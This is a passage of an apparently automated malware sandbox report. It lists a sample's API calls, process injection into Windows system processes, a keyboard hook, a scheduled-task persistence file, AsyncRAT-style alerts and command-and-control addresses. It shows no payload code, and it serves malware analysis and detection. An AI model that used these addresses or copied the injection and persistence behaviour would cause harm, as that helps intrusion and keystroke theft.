Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B95D894 FindFirstFileExW,	44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CDD894 FindFirstFileExW,	45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D0D894 FindFirstFileExW,	45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B1D894 FindFirstFileExW,	46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056DD894 FindFirstFileExW,	47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF0570D894 FindFirstFileExW,	47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	47_2_000001EF0570DA18

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.7:49719

Source: global traffic

TCP traffic: 192.168.2.7:49719 -> 154.216.20.132:6969

Source: Joe Sandbox View	IP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox View	IP Address: 195.201.57.90 195.201.57.90

Source: Joe Sandbox View

ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipwho.is

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: azure-winsecure.com
Source: global traffic	DNS traffic detected: DNS query: ipwho.is

Source: Microsoft-Windows-LiveId%4Operational.evtx.53.dr	String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002B.00000002.2594057411.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079470975.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000002B.00000000.2079135025.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2586980188.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.micom/fwlink/?LinkI
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 0000002D.00000002.2645406461.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002D.00000000.2095647683.00000262ED790000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://osoft.co_2010-06X
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000001D.00000002.2617048225.0000025785F60000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xGh
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.2076913027.000001908E0C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

Source: unknown

HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.7:49720 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5760, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB7A0C5D NtWriteVirtualMemory,	39_2_00007FFAAB7A0C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB7A0FE4 NtResumeThread,	39_2_00007FFAAB7A0FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB79DF98 NtUnmapViewOfSection,	39_2_00007FFAAB79DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB7A0F20 NtSetContextThread,	39_2_00007FFAAB7A0F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB79E078 NtUnmapViewOfSection,	39_2_00007FFAAB79E078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB7A0A3E NtUnmapViewOfSection,	39_2_00007FFAAB7A0A3E
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	41_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	42_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW,	43_2_0000017D2DD52300
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D02C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	45_2_00000262F1D02C80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$rbx-9pdB1aHK

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_pvursesw.30i.ps1

Source: C:\Windows\System32\cmd.exe	Code function: 20_3_000002527DEBCC94	20_3_000002527DEBCC94
Source: C:\Windows\System32\cmd.exe	Code function: 20_3_000002527DEB23F0	20_3_000002527DEB23F0
Source: C:\Windows\System32\cmd.exe	Code function: 20_3_000002527DEBCE18	20_3_000002527DEBCE18
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEED894	20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEE2FF0	20_2_000002527DEE2FF0
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DEEDA18	20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF1D894	20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF12FF0	20_2_000002527DF12FF0
Source: C:\Windows\System32\cmd.exe	Code function: 20_2_000002527DF1DA18	20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exe	Code function: 21_3_00000286D7CECC94	21_3_00000286D7CECC94
Source: C:\Windows\System32\conhost.exe	Code function: 21_3_00000286D7CE23F0	21_3_00000286D7CE23F0
Source: C:\Windows\System32\conhost.exe	Code function: 21_3_00000286D7CECE18	21_3_00000286D7CECE18
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D1D894	21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D12FF0	21_2_00000286D7D12FF0
Source: C:\Windows\System32\conhost.exe	Code function: 21_2_00000286D7D1DA18	21_2_00000286D7D1DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB79F659	39_2_00007FFAAB79F659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB79DD58	39_2_00007FFAAB79DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB79E329	39_2_00007FFAAB79E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB79FDE9	39_2_00007FFAAB79FDE9
Source: C:\Windows\System32\conhost.exe	Code function: 40_3_000001D54780CE18	40_3_000001D54780CE18
Source: C:\Windows\System32\conhost.exe	Code function: 40_3_000001D54780CC94	40_3_000001D54780CC94
Source: C:\Windows\System32\conhost.exe	Code function: 40_3_000001D5478023F0	40_3_000001D5478023F0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D54783DA18	40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D54783D894	40_2_000001D54783D894
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_000001D547832FF0	40_2_000001D547832FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 41_3_000001EF091FCC94	41_3_000001EF091FCC94
Source: C:\Windows\System32\dllhost.exe	Code function: 41_3_000001EF091F23F0	41_3_000001EF091F23F0
Source: C:\Windows\System32\dllhost.exe	Code function: 41_3_000001EF091FCE18	41_3_000001EF091FCE18
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_0000000140001CF0	41_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_0000000140002D4C	41_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_0000000140003204	41_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_0000000140002434	41_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_0000000140001274	41_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0922D894	41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF09222FF0	41_2_000001EF09222FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0922DA18	41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0942D894	41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF09422FF0	41_2_000001EF09422FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 41_2_000001EF0942DA18	41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_3_000001CA7D1BCE18	42_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_3_000001CA7D1BCC94	42_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exe	Code function: 42_3_000001CA7D1B23F0	42_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1EDA18	42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1ED894	42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D1E2FF0	42_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D21DA18	42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D21D894	42_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D212FF0	42_2_000001CA7D212FF0
Source: C:\Windows\System32\lsass.exe	Code function: 43_3_0000017D2DD2CE18	43_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exe	Code function: 43_3_0000017D2DD2CC94	43_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exe	Code function: 43_3_0000017D2DD223F0	43_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD5DA18	43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD5D894	43_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD52FF0	43_2_0000017D2DD52FF0
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_0000022F4B9223F0	44_3_0000022F4B9223F0
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_0000022F4B92CE18	44_3_0000022F4B92CE18
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_0000022F4B92CC94	44_3_0000022F4B92CC94
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B922FF0	44_2_0000022F4B922FF0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B92DA18	44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B92D894	44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B952FF0	44_2_0000022F4B952FF0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B95DA18	44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B95D894	44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exe	Code function: 45_3_00000262F1CD23F0	45_3_00000262F1CD23F0
Source: C:\Windows\System32\dwm.exe	Code function: 45_3_00000262F1CDCE18	45_3_00000262F1CDCE18
Source: C:\Windows\System32\dwm.exe	Code function: 45_3_00000262F1CDCC94	45_3_00000262F1CDCC94
Source: C:\Windows\System32\dwm.exe	Code function: 45_3_00000262F1CA23F0	45_3_00000262F1CA23F0
Source: C:\Windows\System32\dwm.exe	Code function: 45_3_00000262F1CACE18	45_3_00000262F1CACE18
Source: C:\Windows\System32\dwm.exe	Code function: 45_3_00000262F1CACC94	45_3_00000262F1CACC94
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CD2FF0	45_2_00000262F1CD2FF0
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CDDA18	45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CDD894	45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D02FF0	45_2_00000262F1D02FF0
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D0DA18	45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D0D894	45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_0000023942AECE18	46_3_0000023942AECE18
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_0000023942AE23F0	46_3_0000023942AE23F0
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_0000023942AECC94	46_3_0000023942AECC94
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B1DA18	46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B12FF0	46_2_0000023942B12FF0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B1D894	46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe	Code function: 47_3_000001EF056ACC94	47_3_000001EF056ACC94
Source: C:\Windows\System32\svchost.exe	Code function: 47_3_000001EF056A23F0	47_3_000001EF056A23F0
Source: C:\Windows\System32\svchost.exe	Code function: 47_3_000001EF056ACE18	47_3_000001EF056ACE18
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056DD894	47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056D2FF0	47_2_000001EF056D2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056DDA18	47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF0570D894	47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF05702FF0	47_2_000001EF05702FF0
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF0570DA18	47_2_000001EF0570DA18

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2684
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2682
